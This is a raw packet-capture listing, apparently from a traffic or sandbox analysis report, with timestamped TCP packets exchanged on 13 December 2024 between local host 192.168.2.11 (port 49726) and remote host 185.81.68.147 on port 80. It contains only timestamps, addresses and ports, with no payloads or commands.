                                                                                                                                                                                                Dec 13, 2024 08:18:56.527740002 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.528405905 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.528712034 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.528723001 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.528733015 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.528764963 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.528789043 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.529645920 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.529969931 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.529979944 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.529993057 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.530009985 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.530033112 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.531044960 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.531069040 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.531086922 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.531102896 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.531111956 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.531152010 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.531173944 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.531189919 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.531204939 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.531220913 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.531225920 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.531255960 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.532074928 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.532114983 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.532130003 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.532155037 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.532244921 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.532300949 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.533236027 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.533286095 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.533324957 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.533447981 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.534430981 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.534493923 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.535754919 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.535769939 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.535808086 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.535832882 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.535870075 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.535902023 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.535916090 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.535932064 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.535947084 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.535963058 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.535969019 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.536003113 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.536932945 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.537522078 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.537539005 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.537569046 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.537672997 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.537713051 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.538533926 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.538551092 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.538597107 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.538686991 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.538703918 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.538743019 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.539334059 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.539362907 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.539377928 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.539406061 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.539499044 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.539576054 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.540488958 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.540504932 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.540520906 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.540574074 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.540767908 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.540831089 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.542963028 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.542979002 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.543059111 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.574388027 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.574413061 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.574429989 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.574517012 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.574531078 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.574582100 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.574645996 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.574707985 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.574723959 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.574749947 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.574796915 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.574836969 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.575467110 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.575529099 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.575544119 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.575572014 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.575618029 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.575675011 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.576297045 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.576325893 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.576340914 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.576364994 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.576447010 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.576503038 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.577138901 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.577204943 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.577222109 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.577244043 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.577274084 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.577311993 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.578247070 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.578296900 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.578311920 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.578332901 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.578416109 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.578452110 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.579164982 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.579204082 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.579225063 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.579247952 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.579365969 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.579410076 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.580476999 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.580692053 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.580735922 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.581592083 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.581655979 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.581671000 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.581696033 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.581788063 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.581826925 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.582942963 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.583005905 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.583022118 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.583045006 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.583112001 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.583169937 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.583359003 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.583444118 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.583458900 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.583482981 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.583584070 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.583637953 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.584213972 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.584278107 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.584294081 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.584317923 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.584384918 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.584423065 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.585042953 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.585071087 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.585088015 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.585114002 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.585230112 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.585272074 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.585885048 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.585980892 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.585998058 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.586029053 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.586040020 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.586080074 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.586710930 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.586802006 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.586817026 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.586842060 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.586895943 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.586936951 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.587547064 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.587613106 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.587627888 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.587650061 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.587680101 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.587718010 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.588386059 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.588469982 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.588486910 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.588510990 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.588541031 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.588579893 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.589221001 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.589304924 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.589320898 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.589345932 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.589440107 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.589495897 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.590073109 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.590090990 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.590111971 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.590140104 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.590235949 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.590293884 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.590918064 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.590970039 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.590986013 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.591006994 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.591062069 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.591099977 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.591692924 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.591751099 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.591766119 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.591789961 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.591840982 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.591878891 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.592521906 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.592601061 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.592617989 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.592639923 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.592689037 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.592732906 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.593430996 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.593487978 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.593504906 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.593527079 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.593615055 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.593653917 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.594192982 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.594254971 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.594270945 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.594299078 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.594392061 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.594432116 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.595026970 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.595084906 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.595101118 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.595122099 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.595222950 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.595257044 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.595848083 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.595912933 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.595928907 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.595949888 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.596021891 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.596056938 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.596683979 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.596765041 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.596781969 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.596806049 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.596960068 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.596999884 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.597521067 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.597548962 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.597563982 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.597588062 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.597780943 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.597820044 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.598359108 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.598423958 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.598439932 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.598462105 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.598516941 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.598552942 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.599173069 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.599251986 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.599267006 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.599287987 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.599329948 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.599363089 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.599997044 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.600074053 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.600090981 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.600115061 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.600188017 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.600223064 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.600871086 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.600929976 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.600946903 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.600969076 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.601039886 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.601094007 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.601679087 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.601758957 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.601773977 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.601798058 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.601844072 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.601891994 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.602538109 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.602555990 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.602591991 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.602631092 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.602647066 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.602691889 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.603771925 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.603789091 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.603804111 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.603820086 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.603832006 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.603853941 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.604139090 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.604166985 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.604181051 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.604201078 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.604319096 CET8049726185.81.68.147192.168.2.11
